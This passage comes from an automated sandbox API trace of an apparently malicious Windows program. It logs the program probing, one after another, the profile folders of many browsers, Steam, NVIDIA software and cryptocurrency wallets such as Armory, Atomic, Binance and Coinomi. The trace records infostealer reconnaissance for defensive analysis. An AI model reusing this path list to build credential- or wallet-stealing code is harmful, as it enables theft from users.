ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.741] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.741] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\360Browser\\Browser\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data") returned 0x3e [0208.741] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.741] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data", lpFilePart=0x0) returned 0x3d [0208.741] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.743] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.743] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Maxthon3\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data") returned 0x34 [0208.743] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.743] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data", lpFilePart=0x0) returned 0x33 [0208.744] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.745] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.746] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\K-Melon\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data") returned 0x33 [0208.746] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.746] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data", lpFilePart=0x0) returned 0x32 [0208.746] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.748] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.748] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Sputnik\\Sputnik\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data") returned 0x3b [0208.748] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.748] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data", lpFilePart=0x0) returned 0x3a [0208.748] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.749] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.749] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Nichrome\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data") returned 0x34 [0208.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.750] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data", lpFilePart=0x0) returned 0x33 [0208.750] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.752] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.752] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CocCoc\\Browser\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data") returned 0x3a [0208.752] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.752] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data", lpFilePart=0x0) returned 0x39 [0208.752] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.754] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.754] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Uran\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data") returned 0x30 [0208.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.754] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data", lpFilePart=0x0) returned 0x2f [0208.754] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.754] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.877] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.878] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chromodo\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data") returned 0x34 [0208.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.878] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data", lpFilePart=0x0) returned 0x33 [0208.878] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.880] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.880] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Mail.Ru\\Atom\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data") returned 0x38 [0208.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.880] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data", lpFilePart=0x0) returned 0x37 [0208.880] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.882] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.882] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data") returned 0x47 [0208.883] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.883] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpFilePart=0x0) returned 0x46 [0208.883] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.885] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.885] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Microsoft\\Edge\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data") returned 0x3a [0208.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.885] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data", lpFilePart=0x0) returned 0x39 [0208.885] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.887] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.887] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience") returned 0x4e [0208.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.887] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", lpFilePart=0x0) returned 0x4d [0208.888] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.890] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.890] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Steam", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam") returned 0x27 [0208.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.890] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam", lpFilePart=0x0) returned 0x26 [0208.890] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0208.892] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0208.892] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CryptoTab Browser\\User Data", lpDst=0x38ef18, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data") returned 0x3d [0208.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb0) returned 1 [0208.893] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data", nBufferLength=0x105, lpBuffer=0x38ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data", lpFilePart=0x0) returned 0x3c [0208.893] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data\\*", lpFindFileData=0x38ed60 | out: lpFindFileData=0x38ed60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed20) returned 1 [0209.014] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0209.014] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Armory", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Armory") returned 0x2a [0209.014] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Armory", nBufferLength=0x105, lpBuffer=0x38ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Armory", lpFilePart=0x0) returned 0x29 [0209.014] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f098) returned 1 [0209.014] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Armory", nBufferLength=0x105, lpBuffer=0x38eb78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Armory", lpFilePart=0x0) returned 0x29 [0209.015] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Armory\\*.wallet", lpFindFileData=0x38ee48 | out: lpFindFileData=0x38ee48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0209.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee08) returned 1 [0209.017] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0209.017] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\atomic", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\atomic") returned 0x2a [0209.017] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\atomic", nBufferLength=0x105, lpBuffer=0x38ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\atomic", lpFilePart=0x0) returned 0x29 [0209.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f098) returned 1 [0209.017] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\atomic", nBufferLength=0x105, lpBuffer=0x38eb78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\atomic", lpFilePart=0x0) returned 0x29 [0209.017] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\atomic\\*", lpFindFileData=0x38ee48 | out: lpFindFileData=0x38ee48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0209.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee08) returned 1 [0209.019] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0209.019] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Binance", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Binance") returned 0x2b [0209.019] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Binance", nBufferLength=0x105, lpBuffer=0x38ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Binance", lpFilePart=0x0) returned 0x2a [0209.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f098) returned 1 [0209.019] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Binance", nBufferLength=0x105, lpBuffer=0x38eb78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Binance", lpFilePart=0x0) returned 0x2a [0209.019] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Binance\\*app-store*", lpFindFileData=0x38ee48 | out: lpFindFileData=0x38ee48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0209.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee08) returned 1 [0209.022] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0209.022] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Coinomi", lpDst=0x38efa4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Coinomi") returned 0x2b [0209.022] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Coinomi", nBufferLength=0x105, lpBuffer=0x38ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Coinomi", lpFilePart=0x0) returned 0x2a [0209.022] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f098) returned 1 [0209.022] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Coinomi", nBufferLength=0x105, lpBuffer=0x38eb78, lpFilePart=0x0 | out: 